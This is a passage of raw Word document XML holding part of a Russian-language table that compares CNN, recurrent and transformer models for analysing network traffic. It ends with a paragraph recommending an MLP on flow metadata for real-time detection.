                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="271E29BA" w14:textId="0200B503" w:rsidR="00C022BB" w:rsidRPr="00C022BB" w:rsidRDefault="00C022BB" w:rsidP="00C022BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2036" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B338F46" w14:textId="702CE1CC" w:rsidR="00C022BB" w:rsidRPr="00C022BB" w:rsidRDefault="00C022BB" w:rsidP="00C022BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="001B38D2" w14:paraId="2013C45E" w14:textId="77777777" w:rsidTr="00C022BB">
        <w:trPr>
          <w:trHeight w:val="843"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="735DEFC9"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Свёрточные сети (CNN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75C4DAEB"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С учителем</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C0F4E9A" w14:textId="6075397A"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 xml:space="preserve">Выявление локальных </w:t>
            </w:r>
            <w:r w:rsidR="00ED4CBB" w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>пространств</w:t>
            </w:r>
            <w:r w:rsidR="00ED4CBB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>енных</w:t>
            </w:r>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> паттернов в данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12472CB6"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Требует большого объёма данных, сложность интерпретации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2036" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="138C659E" w14:textId="77777777" w:rsidR="007C1383"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 xml:space="preserve">Анализ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="007C1383" w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>структури</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="007C1383">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F8AEF86" w14:textId="3522CFD8" w:rsidR="008E0171" w:rsidRPr="00C022BB" w:rsidRDefault="007C1383" w:rsidP="00C022BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>р</w:t>
            </w:r>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>ованных</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="008E0171" w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> представлений пакетов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="001B38D2" w14:paraId="02B757E3" w14:textId="77777777" w:rsidTr="00C022BB">
        <w:trPr>
          <w:trHeight w:val="1830"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31611813"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Рекуррентные сети (LSTM/GRU)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74E56724"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С учителем</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FB2D2E8"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Учёт временных зависимостей в потоках трафика</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40F35E55" w14:textId="77777777" w:rsidR="00ED4C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 xml:space="preserve">Высокие </w:t>
            </w:r>
            <w:r w:rsidR="00ED4CBB" w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>вычисли</w:t>
            </w:r>
            <w:r w:rsidR="00ED4CBB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A51C774" w14:textId="4D93FA3A" w:rsidR="008E0171" w:rsidRPr="00C022BB" w:rsidRDefault="00ED4CBB" w:rsidP="00C022BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>тельные</w:t>
            </w:r>
            <w:r w:rsidR="008E0171" w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> затраты, длительное обучение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2036" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E5D7752" w14:textId="6F1481FB"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 xml:space="preserve">Приоритетная для анализа </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>последова</w:t>
            </w:r>
            <w:r w:rsidR="007C1383">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>тельностей</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> событий</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="001B38D2" w14:paraId="117BB652" w14:textId="77777777" w:rsidTr="00C022BB">
        <w:trPr>
          <w:trHeight w:val="1669"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EB363CD" w14:textId="30126961" w:rsidR="008E0171" w:rsidRPr="00C022BB" w:rsidRDefault="00D1702E" w:rsidP="00C022BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D1702E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Attention</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D1702E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">-модели </w:t>
            </w:r>
            <w:r w:rsidR="008E0171" w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008E0171" w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Transformer-based</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="008E0171" w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53087C20"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С учителем</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="078EC181" w14:textId="39BB85F4"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Паралле</w:t>
            </w:r>
            <w:r w:rsidR="007C1383">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>лизаци</w:t>
            </w:r>
            <w:r w:rsidRPr="00D1702E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>я</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D1702E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> учёт долгосрочных зависимостей</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AA2183B"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Требует очень больших датасетов, высокая сложность</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2036" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="078842EA" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C022BB" w:rsidRDefault="008E0171" w:rsidP="00C022BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Перспективно для будущих исследований</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="520E1AD1" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00201E0D" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="340" w:firstLine="709"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02279228" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00875C30" w:rsidRDefault="008E0171" w:rsidP="00967078">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B38D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">На основании таблицы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="001B38D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для реализации нейросетевого модуля целесообразно использовать архитектуру MLP, работающую с векторизованными метаданными потоков. Это обеспечивает баланс между точностью детекции и производительностью в реальном времени.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431EADEC" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="001B38D2" w:rsidRDefault="008E0171" w:rsidP="00230C61">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
